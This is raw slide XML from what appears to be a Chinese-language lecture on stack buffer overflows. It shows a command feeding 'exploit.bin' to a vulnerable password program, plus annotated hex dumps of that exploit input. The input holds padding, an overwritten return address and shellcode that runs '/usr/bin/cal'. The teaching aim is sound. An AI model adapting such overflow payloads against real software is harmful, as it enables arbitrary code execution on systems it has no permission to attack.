                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>/bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>cal</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Arial" charset="0"/>
                          <a:ea typeface="宋体" charset="0"/>
                          <a:cs typeface="宋体" charset="0"/>
                        </a:rPr>
                        <a:t>\0"</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="31969" marR="31969" marT="15984" marB="1598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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{995E8DC3-6773-B14F-B697-ECFEC989770F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4263446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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>vulprog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>exploit.bin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45059" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>通过下面的二进制输入，这个密码程序能够被用来执行任意的代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>000  31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>010  37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a· +"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>020  31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>030  F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 "· +ï§ · +-Ç · +1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>040  31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2952182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a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Mal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> Decomposed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2743200"/>
            <a:ext cx="9144000" cy="2209800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>000  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>010  37 38 39 30 31 32 33 34 35 36 37 38 E0 F9 FF BF "789012345678a· +"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>020  31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>030  F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ï</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>§ · +-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Ç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> · +1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>040  31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46084" name="AutoShape 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="1676400"/>
            <a:ext cx="5029200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -33681"/>
              <a:gd name="adj2" fmla="val 94792"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>第一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>字节的二进制数据将填满分配的密码存储空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46085" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="4572000"/>
            <a:ext cx="6858000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCFFFF"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="30000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0"/>
              <a:t>版本的编译器分配堆栈用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0"/>
              <a:t>字节的操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3516848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pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Mal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> Decomposed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2514600"/>
            <a:ext cx="8305800" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>000  31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36 "1234567890123456"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>010  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>37 38 39 30 31 32 33 34 35 36 37 38</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>E0 F9 FF BF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>789012345678</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>a· +"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>020  31 C0 A3 FF F9 FF BF B0 0B BB 03 FA FF BF B9 FB "1+ú · +¦+· +¦v"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>030  F9 FF BF 8B 15 FF F9 FF BF CD 80 FF F9 FF BF 31 "· +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>ï</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>§ · +-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Ç</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> · +1"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>040  31 31 31 2F 75 73 72 2F 62 69 6E 2F 63 61 6C 0A "111/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:cs typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>cal</a:t>
            </a:r>
